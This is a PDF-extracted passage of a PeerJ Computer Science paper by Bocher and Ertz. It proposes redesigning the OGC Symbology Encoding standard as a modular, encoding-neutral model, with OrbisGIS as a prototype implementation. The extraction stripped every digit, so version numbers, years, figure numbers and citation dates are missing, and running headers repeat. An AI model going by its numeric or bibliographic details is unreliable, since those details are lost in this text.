&request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the wms/sld getmap operation allows to reference a style authored by the user client, either hosted on an external server (parameter sld) or directly sent with the wms request (parameter sld_body). <?xml version=" . " encoding="utf- " standalone="yes"?> <styledlayerdescriptor version=" . . " xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc" xmlns:xsi="http://www.w .org/ /xmlschema-instance" xsi:schemalocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/ . . /styledlayerdescriptor.xsd"> <namedlayer> <name>ch.swisstopo.pixelkarte-pk .metadata-kartenblatt</name> <userstyle> <name>labelblattnummer</name> <featuretypestyle> <rule> <polygonsymbolizer> <fill> <cssparameter name="fill">#ffff </cssparameter> </fill> <stroke> <cssparameter name="stroke"># </cssparameter> <cssparameter name="stroke-width"> </cssparameter> </stroke> </polygonsymbolizer> <textsymbolizer> <label> <ogc:propertyname>blattnummer</ogc:propertyname> </label> <font> <cssparameter name="font-family">arial</cssparameter> <cssparameter name="font-size"> </cssparameter> </font> <fill> <cssparameter name="fill"># </cssparameter> </fill> </textsymbolizer> </rule> </featuretypestyle> </userstyle> </namedlayer> </styledlayerdescriptor> bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in other words, the user client (e.g., mr tüftel) does take the control of the rendering process that may be distributed among many wms servers. indeed, this ability to drive remotely from the user client side (with a map viewer including a style editor) the wms rendering server does open interesting doors to bring to life the other use cases. use case “catalog” going further than using a simple wms getmap request to get a ready-to-visualize map layer, the deprecated implementation specification (version . , released in ) of the wms/sld standard (lalonde, ) does offer style management requests like getstyles. so you get also the underlying symbology instructions of an internal style that has been predefined and used by the server to show a prepared cartographic facet of some spatial data of the underlying datasets. thus, the retrieved style is ready to be reworked by the user client within a cartographic tool (fig. ). while such an ability is already interesting for the use case level , the sld . style management offers not only getstyles operation but also putstyles operation. together, these operations are a good start for the use case level to build a catalog of styles. the wms service is then also the storage point to discover, import and export styles to share with other sdi users through a catalog service. nonetheless, it is to notice that the newest sld . release does not specify anymore the style management requests which is then a step back. use case “collaborate” finally, for the use case level , the se standard is also a centerpiece (fig. ). as experimented by bocher et al. ( ) in the frame of the sogville/scapc research projects, se figure visualization of the grid of map sheets of switzerland ( : , ) through another cartographic facet showing labels based on the sheet number. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ instructions are encapsulated into a structure of map project that different users share and work together in the frame of a collaborative cartographic authoring process. indeed, while the ogc ows context standard is used to formalize the map project, it does in particular consider sld and se to formalize the shared styles used to render the map layers. currently, sld (sld . ) or se (se . ) (as styling language to formulate symbology instructions) are the more advanced open standards for sharing cartography as illustrated figure re-authoring of styles shared through catalogs with ogc wms/sld standards. full-size doi: . /peerj-cs. /fig- figure creation of a common map based on shared styles with ogc wms/sld, se and ows context standards. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by the above use case levels. these standards are quite largely adopted by server-side rendering systems. it can be explained because sld is a wms application profile which is web service oriented. indeed, andrae et al. ( ) redraws the ogc portrayal model by showing clearly sld as the web interface to take control of the rendering engine behind the wms service. but in , the wms/sld . profile has been released in particular with the aim to extract the symbology instructions into a dedicated standard, the se standard (se . ). as a consequence, while the sld profile stays strongly related to wms service, it is no longer the case for the symbology instructions which can now be used by any styling software component, not only by wms/sld. nonetheless, at the desktop-side there are only few software which correctly and completely implement se standard together with a graphical user interface to (re)work styles. indeed, according to bocher et al. ( ) many implementations have a conformance that is often not fully observed leading to interoperability defects in term of rendering quality. apart from inherent bugs and dysfunctions of a tool, several reasons can explain this general situation. � due to a partial implementation—see mapserver implementation (mckenna, ), there are unimplemented symbology instructions, e.g., linejoin and linecap of linesymbolizer; � due to the existence of two versions of symbology instructions between sld . and se . , these tools may not check this correctly which causes parsing problems of the xml encoding; � due to the divergent reading of what the se . standard tries to specify which may result in different graphical visualizations (it means there are uncomplete or ambiguous explanations in the specification—like the markindex capability which doesn’t specify anything on how to select an individual glyph); � related to the previous point, there is currently no substantial testsuite within the ogc compliance and interoperability testing initiative (“cite”) to help to disambiguate and test the graphical rendering conformance of an implementation. beyond encoding validity and level of conformance of an implementation (range of supported capabilities), visual interpretation is essential (see annex a in müller ( )). for instance, by comparing the output of a system to test with the output of the reference implementation. while the above arguments do show how it is essential to have a common styling language (currently in the name of ogc se . ), this importance is accentuated by the fact that many changes and proposals have been received by the standard working group (swg), in particular from the scientific community (duarte teixeira, de melo cuba & mizuta weiss, ; cooper, sykora & hurni, ; sykora et al., ; dietze & zipf, ; sae-tang & ertz, ; schnabel & hurni, ; mays, ; iosifescu-enescu, hugentobler & hurni, ; bocher et al., ; rita, borbinha & martins, ; bocher & ertz, ). all these works share a common claim about enhancing se. it seems the communities of users were frustrated because no substantial new symbology capabilities bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have been introduced with the release of se . except transformations functions. moreover, bocher et al. ( ) and bocher & ertz ( ), explain that these only new and few capabilities (interpolate, recode, categorize functions) cause confusions and even some regressions. for instance, despite all the good intentions, there are several limits that come out from the introduction of the categorize function (defined by se . standard as the transformation of continuous values to distinct values, e.g., useful to build choropleth maps): � the definition seems to only match a requirement emphasized by jenks (slocum et al., ) that classes must cover all the possible values of the dataset and must not be discontinuous. however, such a definition has limits considering optimal methods like the jenks–fisher classification or maximum breaks classifications that may produce intervals with gaps (slocum et al., ) and that it is often better to use the lowest value of the dataset as the minimum value of the first interval rather than negative infinity; � the categorize function is redundant with the concept of rule of the se standard. moreover, the latter does offer wider possibilities to define precisely value intervals (minimum/maximum values instead of negative/positive infinite, non-contiguous intervals, interval as singleton); � similarly, the rastersymbolizer concept used to control the styling of raster data has been reduced because of the colormapentry concept from sld . has been replaced by the categorize transformation function; � finally, the introduction of categorize function has also removed from sld . the capability to associate a label to an interval when it is an important requirement to have such an information to build a map legend. along the same lines, the many proposed extensions of sld and se standards have to be analyzed. the purpose is to identify how these cartographic enhancements are relevant for the redesign of the se standard. by way of other examples, sae-tang & ertz ( ) describe four new possibilities to generate thematic maps (categorythematicsymbolizer, simplethematicsymbolizer, multithematicsymbolizer, chartthematicsymbolizer). a similar approach appears in dietze & zipf ( ) (diagramsymbolizer and choroplethsymbolizer) and in iosifescu-enescu, hugentobler & hurni ( ) to support various diagram types (e.g., pie charts, bar diagrams) to fulfill the complex visualization requirements coming from environmental management. also, the specific options introduced within the xsd schemas by some off-the-shelf geospatial software (e.g., “geoserver”) have to be considered. of course the extensible nature of xml is convenient to add cartographic capabilities to implement in the software, but it may at the same time also create some non-interoperable defects. clearly, it seems se . has never been designed with modularization and extensibility in mind and there are no explicit extension points defined in the underlying symbology model. moreover, the se standard does currently only offer one xml-based encoding and strongly linked to xml modeling principles (fig. ). as a consequence, it may be bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ difficult for cartographic communities and developers having different encoding preferences (e.g., css-like or json-based) to get a chance to observe conformance. indeed, while there is a general trend to dislike xml, other encodings seem to be in fashion, like the yaml-based ysld styling language proposed by geoserver ( ) in addition to the support of ogc sld standard, or the css-derived styling languages mapcss (openstreetmap, ) or cartocss styling language from mapbox ( ), although it seems already old-fashioned (macwright, ). also, there are major proponents of an encoding which would make a wider use of relevant and famous graphical standards like svg, just like ows context does use the famous atom syndication format (brackin & gonçalves, ). beyond the trends, there is no consensus by now. figure the physical symbology model of se formalized with xml schema definition. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to conclude this chapter, while there are clear possibilities to implement the four levels of sharing cartography, it is also clear that a revision of the common styling language played by the se standard is required. three major requirements have to be considered: � enrich the standard with new cartographic capabilities inline with the evolution of the needs coming from the map-makers community; � redesign the underlying symbology model of the standard so as to be modular and extensible for the long-term; � consider the possibility to have other encodings than xml. the next chapter does develop some proposals to fulfill these requirements. proposals the overall purpose is to make standards dedicated to cartography (in particular se) more attractive by turning them into “a really useful (cartographic) engine,” quoting the nod to thomas the tank engine alluded by the ogc “specification model—a standard for modular specifications” document (policy swg, ), called the modular spec in below. before compiling all the change requests collected by the sld/se swg, one question does arise: how to plug a new requested ability in the standard? one first and fundamental recommendation is then to consider the modular spec whose release . has been edited in , at the time the se standard was already released and thus not in compliance with. indeed, the modular spec specifies generic rules to organize the internal logical structure of the standard in a modular way so as to strengthen the guarantee of a useful and worth standard easy to implement but also to extend. modular structure: one symbology core, many symbology extensions the modular spec fittingly suggests modularity with the idea of a standard built of one simple core and many extensions which expand the functionality of the specification. applied to a new revision of the se standard, the definition of a symbology core requires first to “reverse design” the underlying symbology model of se . . after which, the concrete symbology capabilities have to be extracted and split into many relevant extensions while taking care of dependencies. the proposed minimal symbology core illustrated by fig. is partially abstract and defined according to the following concepts: � the style concept, in charge of the cartographic portrayal of a collection of features stored within a layer by applying at least one symbology rule. a feature is described as an abstraction of real world phenomena as defined by gml standard (portele, ); figure recommendation for a minimal symbology core. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � the rendering does run feature per feature using a “one drawing pass” engine; � each rule may be scale filtered and does hold at least one symbolizer; � each symbolizer does describe the graphical parameters for drawing the features (visual variables); � the style, rule and symbolizer concepts hold parameters which are literal values. some of the concepts are defined as abstract (in yellow and with italic names in fig. ) so as to be considered as extension points. actually, regarding this, we may notice that craig ( ) does request a similar concept by the use of xml abstract elements which may than be considered as extension points. now that the core is ready, some surrounding extensions may be defined so that the engine is really able to perform a rendering. indeed, alone, the core does not concretely “do” anything. as an example, let us introduce the areasymbolizer extension which holds a simple and classical symbolizer, call it the areasymbolizer concept which describes the graphical parameters for drawing polygonal features with outlined and filled surface areas. the aim of the below explanations is to illustrate with a simple example the extension mechanism and how extension points are expanded. at first, it is defined that the areasymbolizer extension has a dependency with the featuretypestyle extension and the related concepts: � the featuretypestyle specialization of the style core concept; � the portrayal of a layer built of n instances of gml abstractfeaturetype (portele, ); � the ability to access features according to simple feature sf- (van den brink, portele & vretanos, ); � the geometry parameter to each symbolizer extension that depends on this extension (in this case the areasymbolizer extension). then, given that the geometry parameter is defined with a dependency on the valuereference extension, the valuereference specialization of the parametervalue core concept is introduced. in a general way, when a parameter has to be assigned with a value, valuereference does introduce the ability to reference the value extracted from a data attribute of a feature. this is useful when a featuretype does hold many geometry properties and allows to reference the one to be used by the renderer. finally, the areasymbolizer extension itself is required, holding the areasymbolizer specialization of the symbolizer core concept. called polygonsymbolizer in se . and correctly renamed areasymbolizer by craig ( ), it does introduce: � the symbology ability to draw a surface area according to a filling and an outline; � the dependency on the featuretypestyle, fill and stroke extensions; � the ability to reference the geometry data attribute to be drawn (by means of its dependency on the featuretypestyle extension). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in consequence, an implementation that wants to observe conformance with the areasymbolizer extension requires to implement and drive its rendering engine according to all the concepts of the core (thin outline in fig. ) and the areasymbolizer concept with all the other concepts required by dependencies (bold outline in fig. ). nonetheless, even at this point, a rendering engine would neither concretely “do” anything. indeed, the implementation has then to offer choices related to the filling and the outline. some more concrete capabilities have to be implemented, for instance with (dashed outline in fig. ): � the solidfill concept, a fill specialization which introduces the graphical ability to define a solid color value combined with an opacity; � the penstroke concept, a stroke specialization which introduces the graphical ability to draw a continuous or dashed line with or without join and cap; � the dependent abstract color concept (and again a concrete choice of color definition has to be done, like with the rgbcolor concept which defines a color in the srgb color space with three integer values). having this modularity approach for long term extensibility applied to all the symbolizer concepts, past, present and future, an implementation can with ease manage step by step the evolution of the conformance level of its technical implementation of the standard. one encoding-neutral conceptual model, many encodings currently, se . offers a physical model using xml schema definition and, at the same time, a natural encoding based on xml. the initial motivation explaining the below recommendation is related to the fact that there is not only xml, but also many other flavors of encoding, json-like, css-like, yaml-like among many others it is possible to imagine. the important for portrayal interoperability is not the encoding, it is rather the figure concepts to implement so as to observe conformance with the areasymbolizer extension. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ symbology model. that is why the “one encoding-neutral model/many encodings” approach is promising to favor a large adoption of the standard. this approach has on one side the encoding-neutral model formalized using uml notations, it can be considered as conceptual. with a class diagram, it does describe the portrayal concepts, their relationships, the modular organization, the extension points and the dependencies. we may notice that uml is often preferred when some work is about the design of portrayal concepts. in zipf ( ), a simplified version of the underlying symbology model of se . is depicted as an uml class diagram. moreover, craig ( ) does suggest to avoid the xsd attribute concept in the xml encoding so as to be more portable to other structuring languages which do not have the unusual attribute concept of xml schema, uml in particular. these are more arguments that are in favor of defining at first a conceptual and encoding-neutral model (fig. ). consequently, doors are open to offer a variety of encodings. each encoding does translate into a format the uml notations according to mapping rules. at least one figure extract of the proposed symbology model. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ default encoding and following the ogc tradition, xml may be this default encoding. it is up to the swg to define the mapping rules to translate the semantic of the conceptual model into xml schema definitions. indeed, as noticed by lonjon, thomasson & maesano ( ), the translation from uml to xml requires a thoughtful analysis of the conceptual model so as to define the global mapping rules (e.g., translate a specialization relationship using static or dynamic typing? how to translate a concrete class, an abstract class, the various types of associations? when using attributes or elements?, etc.). thus, uml and xml are together a winning combination two times inline with the modular specification which recommend uml “if the organizing mechanism for the data model used in the specification is an object model” and xml “for any specification which has as one of its purposes the introduction of a new xml schema.” of course, all these questions related to the mapping rules have to be considered for each encoding offered with the standard. we may notice that the ows context swg adopted a similar approach, offering the default encoding based on xml atom and planning to provide an ows context json encoding soon, according to brackin & gonçalves ( ). style management and parametrized symbolizer beyond the tempting recommendation to reintroduce the wms/sld getstyles and putstyles methods, the management of a catalog of styles has to be expanded. thus, craig ( ) does suggest the introduction of a mechanism to reference the definition of a symbolizer hosted within a catalog. moreover, the report does enrich the referencing with a symbolizer-parameterization mechanism so as to offer complete symbolizer re-usability between different, incompatible feature types. it consists of a list of formal-parameter names and an argument list. it is to notice that such a mechanism does fit the one specified by iso ( ) in term of parameterized symbol built of dynamic parameters. thus, in a general way, it is recommended to consider what iso has already specified concerning the concepts of “collection of symbols and portrayal functions into portrayal catalog.” concerning this aspect of style management, the proposal suggests to continue the conceptual work by blending together all these recommendations: reintroduce getstyles/ putstyles and introduce the mechanism of symbolizer-parameterization inline with iso ( ). new symbolization capabilities among the many symbology capabilities that can be extracted from the pending change requests at ogc and the research works, we list below (non exhaustively) some relevant ones. considering the modular structure (see a), each of these capabilities is an extension (e.g., hatchfill is an extension of the fill abstract concept, just as solidfill): � unitofmeasure: current se . standard does only offer two ground units (meter and foot) and one portrayal unit (pixel, which is also not an absolute unit of measure). it may be relevant to add at least three additional units to make measurements more bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ portable between styling representations and rendering environments: portrayal millimeters and inches as printing measurements, and portrayal (printer’s) points commonly used for font sizes; � transformations: currently, se . standard does offer only locally few transformations capabilities (translation of a polygon or graphic, rotation of a graphic). it may be relevant to spread out all kind of general affine transformations like translate, rotate, scale, matrix using homogeneous coordinates on geometries and graphics; � functions: currently, se . standard does extend the concept of ogc:expression inherited from the deprecated filter encoding . standard (vretanos, ) to adequately support the needs of symbolization in transforming (categorization, recoding, and interpolation) and editing data (formatting numbers, strings and dates). it may be relevant to directly use the function definition mechanism of filter encoding . standard (vretanos, ) rather re-inventing such a mechanism (craig, ); � compoundstroke: current se . standard does offer simple stroke just like with a pen (optionally with dash pattern) or the linear repetition of a graphic. it may be relevant to allow multiple graphic and/or simpler strokes to be combined together along the linear path. it is interesting to produce complex stroke styles such as rendering a sequence of graphic icons along a line or drawing simple dashed lines between boat-anchor icons (craig, ); � compositesymbolizer: currently, grouping of symbolizers is only possible in relation with a rule, eventually driven by a filter. it may be relevant to manage descendant symbolizers as a single unit separately from the definition of a rule. having a dedicated concept for grouping symbolizers does make the logical grouping more explicit and allows a group of symbolizers to be remotely referenced (see the symbolizerreference concept in craig ( )); � hatchfill: currently, se . standard allows one color filling and the repetition of a graphic to fill an area. it may be relevant to add cross hatching, a method of area filling which is often used and has so simple parameters that it should be established as another filling variety. it is required to allow the configuration of such a filling in a way conventional in cartography, otherwise the user would be forced to emulate cross hatching by fiddling with the graphicfill concept; � diagramsymbolizer: current se . standard does allow the use of graphics generated externally (e.g., static image) or well-known shapes or font glyph whose color can be set internally. it may be relevant to allow the internal definition of more complex diagram symbolization of geographic features like “pie,” “bar,” “line,” “area,” “ring,” and “polar” charts. indeed, it is a usual and effective way of visualizing statistical data (iosifescu-enescu, ); � multiple drawing pass: current se . standard does describe a one drawing pass rendering (driven by applying symbolizers in the order they are defined by the style and according to rules and filters). it may be relevant to better control the rendering with the capabilities to order the level of symbol rendering (e.g., to draw nicely connected highway symbols). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reference implementation the orbisgis platform has been used to prototype an implementation of the symbology model all along the standardization work by iterations with tests and validations (bocher & petit, ). in the long term, this platform might be adopted as a reference implementation at the ogc (“cite”). orbisgis is a geographical information system designed by and for research (bocher & petit, ) which is the main advantage for research communities comparing to other gis. indeed, orbisgis does not intend to reproduce classical gis functionalities. it is designed to explore new issues or questions in the field of geospatial techniques and methods (such as language issues to query spatial information and issues on cartography about standardization, semantics and user interface design). to address these challenges, the orbisgis architecture (object and data model) and its user interface are frequently redesigned. this approach is fundamental to test the concepts and the ideas related to the ongoing standardization process of symbology standards at ogc. furthermore, the fact that we have a common set of gis features organized with the dynamic module system osgi to access to the geodata, library to use simple features functions, layer model, rendering engine, etc. (osgi, ), gives flexibility to plug some experimental code without breaking the platform and the user can easily switch from one to another plugin (fig. ). more importantly, the usage of osgi technology does offer a way to implement the modularization principles depicted in the above (i.e., one osgi bundle per symbology extension). another motivation is related to the license. orbisgis is an open source software, distributed under the gpl license and therefore grants four freedoms ( ) to run the program for any purpose, ( ) to study how the program works and adapt it to your needs, figure orbisgis dynamic module system with osgi. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( ) to redistribute copies so you can help your neighbour, and ( ) to improve the program, and to release your improvements to the public, so that the whole community benefits (steiniger & hunter, ). this aspect is essential in order to have a reference implementation available for the community of implementers of a standard, guiding them better in the understanding of a specification. given the core principle of science that having open source code available does enable reproducibility (ertz, rey & joost, ), we argue that this is also valid for open standards. on one side, it is easy for other researchers and businesses to verify and re-use new developments and adapt them to their needs (steiniger & hunter, ). furthermore, having the code of the rendering engine, the user interfaces and all the tests fully accessible should facilitate the understanding and the dissemination of standards for portrayal interoperability while minimizing interoperability defects. in the following we describe the main aspects covered by orbisgis to implement the proposed redesign of the symbology model. xml encoding/decoding in the context of a prototyping iteration, the symbology model presented in the chapter has been transposed to a xsd schema (maxence et al., ). the java architecture for xml binding (ort & mehta, ) library is used to generate the xsd schema-derived java binding classes. finally, a java style object model is built. thus, symbology instructions are stored in a style file using xml encoding and is parsed prior to be applied by the rendering engine. rendering engine the rendering engine is a osgi bundle whose mechanism is divided into sequences (fig. ): ( ) user interface event to draw a map. ( ) the renderer engine gets the style file that contains the symbology instructions. figure main sequences of the rendering engine. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( , and ) the style file is read by the xml parser to create the java style object model composed of rules and symbols. ( ) the renderer engine starts to draw the style object looping over each rules. ( ) each rule is scanned to check if a filter must be applied. the filter condition (e.g., select all values greater than : : : ) is prepared for each symbolizer of the rule. ( ) the renderer engine starts to draw all symbols available in the java style object model. ( ) each symbol reads the data source on which the style must be applied. ( ) a set of features according to the potential filter constraint of the symbolizer is returned (including geometries and data attributes). ( ) the symbols are filled with the features properties to create the graphic elements and visual variables. ( ) finally, the renderer engine displays the style as a map image. user interfaces orbisgis offers two kind of user interfaces for configuring the map styles using the capabilities of the underlying symbology model (fig. ): � at first some productivity tools organized around a set of widgets each dedicated to common thematic maps. the possibilities are limited to what these widgets are able to configure related to what they have been built for. nonetheless, the second tool can then be used in an expert mode to go further. � secondly, rather intended for an expert who want to tinker and tweak. as an advanced style editor, it is a flexibility tool which allows to manipulate all elements of the symbology model (rule, symbols, visual variables). a good knowledge of the symbology model is required because each elements of the style must be set individually. consequently, the user can express without any limitation (except the limits of the symbology model itself) all her(his) creativity to build cartographic visualizations. to illustrate some results rendered with orbisgis we present two maps extracted from the “wall of maps” (bocher & ertz, ). the first one shows a bivariate map to display the number of building permits in europe in compared to (fig. ). bivariate map is a common technique to combine visual variables. the map uses the same type of visual variable to represent two values (as half circles). the main symbology elements used to create this bivariate map are: � the style element contains two rules named a and b; � rule a contains one symbolizer element (areasymbolizer) to display the stroke of the european countries; � rule b defines the bivariate proportional symbol with two elements of pointsymbolizer (for readability, we present only the instructions for the left half-circle visual variable); bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � the pointsymbolizer contains several sub-elements: – the geometry element allows specifying which geometry attribute is to be rendered; – the st_pointonsurface is an ogc filter function (vretanos, ) used to have a point geometry guaranteed to lie on the surface. this new point derived from the input geometry is the location where to anchor a markgraphic, otherwise the symbol might be applied on all the vertices of a geometry; � the markgraphic is defined by: – the symbol shape identified by a well-known name, halfcircle (right side); – the size of the shape varies according the height of its view box; – to have the shape size proportional with the number of building permits in : � an interpolate function is applied on; � it uses a valuereference that points to the attribute named permits ; � the interpolation is defined by two interpolation points chosen along a desired mapping curve (here the minimum and maximum values); � for each interpolation point the height of the view box is specified with a specific unit of measure; – because the half-circle shape is drawn to the right side, a � rotation is operated; – to finish, the markgraphic is filled with a rgb color. the second map shows a combination of several visual variables: shape, size, color, patterns and orientation (fig. ). the style is organized around six filtered rules that correspond to the biogeographic regions in switzerland. we present two rules (a and b) that use the hatchfill and graphicfill concepts which are extensions of the fill abstract concept of the symbolizer model. conclusion considering the fundamental works of bertin & berg ( ) and successors, the community of map makers has constantly investigated questions about cartographic visualizations in term of design using the appropriate visual variables and combining them together with relevancy. despite an important body of principles and practices, the community did not grasp the questions about standardization. however, given the multiplicity of software used to flood the world with maps, these questions are nowadays a strategic challenge to be considered in relation with operational requirements. even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the work aiming at the creation of dedicated standards for cartography is a way to share and disseminate good practices. indeed, too much sdis do merely accept the limits of the current standards and consequently poor map design and quality. while they have to apply ogc standards, it is essential to build standards so as to be able to enrich their bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure (a) the screenshot shows the list of productivity tools available in orbisgis. (b) the screenshot shows the user interface of the productivity tool dedicated to choropleth maps. (c) the screenshot shows a prototype of advanced style editor. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure (a) symbology instructions showing how to combine visual variables (yaml encoded for the ease of reading). (b) a map of the biogeographic regions in switzerland coming out from the rendering engine using these instructions. full-size doi: . /peerj-cs. /fig- figure (a) some redesigned symbology instructions (yaml encoded for the ease of reading). (b) a bivariate proportional symbol map coming out from the rendering engine using these instructions. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cartographic capabilities at long-term, to make grow up the good practices and finally to improve the quality of the visualizations. in this sense, we have identified some use cases showing how it is important to make portrayal interoperability operational for sharing cartography, from discovery to collaboration activities, by way of authoring and cataloging activities. from research results in link with the dedicated sld/se ogc swg (ertz & bocher, ), this paper does extract some recommendations to enable portrayal interoperability. they invite to improve the ogc se standard based on principles and practices in cartography. we start from a functional definition of a map translated into a set of visual variables which are combined to create symbols and finally a map style. the proposed recommendations do observe this functional definition which is already at the heart of how se standard has been specified by ogc. now, in the long term, it is recommended that a design approach is driven by a conceptual definition of the model and unconstrained by specific encoding aspects, and, as soon as the model is ready, then a default encoding is offered (e.g., xsd/xml). following from this approach of dissociation, it does allow the definition of other encodings according to the various flavors within the communities. given that the cartographic requirements will progress over time due to practices growing up and according to domain specific features, the offered symbology model is empowered so as to be extensible and ready to offer new cartographic methods. moreover, such a modular approach allows implementations to be compliant step-by-step. as a consequence the adoption of the standard should be favored. finally, we claim to a testsuite within the ogc cite so as to help to disambiguate and test the visual conformance of the implementations. while it shall be associated to reference implementations, having at least one open source is also essential for the community of implementers, guiding them even more in the understanding of the standard. in this sense, orbisgis is an open source platform that has been used to prototype an implementation of the symbology model all along the standardization process by iterations with tests and validations. it might become an open source reference implementation. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � erwan bocher conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � olivier ertz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github repository with the orbisgis platform, containing a partial implementation of the symbology rendering model: https://github.com/orbisgis/orbisgis. references andrae c, graul c, over m, zipf a. . web portrayal services: opengis web map service, styled layer descriptor, symbology encoding und iso portrayal vorgestellt und erläutert. opengis essentials: die geo-standards von ogc und iso im überblick. berlin: wichmann. oclc . bertin j, berg wj. . semiology of graphics: diagrams, networks, maps. first edition. redlands: esri press. bocher e, ertz o. . towards cartographic portrayal interoperability—the revision of ogc symbology encoding standard. in: proceedings of the st ica european symposium on cartography, vienna, austria. vol. , – . bocher e, ertz o. . ogc symbology model and encodings—the wall of maps. available at http://se.orbisgis.org (accessed september ). bocher e, ertz o, laurent m, hégron g, petit g, rappo d. . cartographie et standard: du modèle a l’utilisateur. in: proceedings of the th international cartographic conference paris, – july . paris: iccoclc. bocher e, petit g. . orbisgis: geographical information system designed by and for research. in: bucher b, ber fl, eds. innovative software development in gis. hoboken: john wiley & sons, inc., – . bocher e, petit g. . cartography—orbisgis manual . documentation. available at http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology (accessed september ). bocher e, petit g, gueganno a, fortin n, gourlay a, ertz o. . séminaire de restitution du sogville (système d’observation géographique de la ville). technical report. available at https://halshs.archives-ouvertes.fr/halshs- (accessed september ). brackin r, gonçalves p. . ogc ows context conceptual model. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/owc (accessed september ). bruns a. . from prosumption to produsage. cheltenham: edward elgar, – . carpendale mst. . considering visual variables as a basis for information visualisation. technical report. calgary: university of calgary. cooper m, sykora p, hurni l. . the role of cartography within distributed software systems: what can we contribute? how can we prosper? in: lapaine m, association ic, eds. nd international cartographic conference and th general assembly of the ica. a coruña: international cartographic society. craglia m. . building inspire: the spatial data infrastructure for europe. arcnews : – . bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/orbisgis/orbisgis http://se.orbisgis.org http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology https://halshs.archives-ouvertes.fr/halshs- http://www.opengeospatial.org/standards/owc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ craig b. . ogc� ows- symbology encoding (se) changes (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://portal.opengeospatial.org/files/ ?artifact_id= (accessed september ). de la beaujardiere j. . opengis web map server implementation specification (ogc – version . . ). open geospatial consortium inc., . available at http://portal.opengeospatial. org/files/?artifact_id= (accessed september ). dietze l, zipf a. . extending 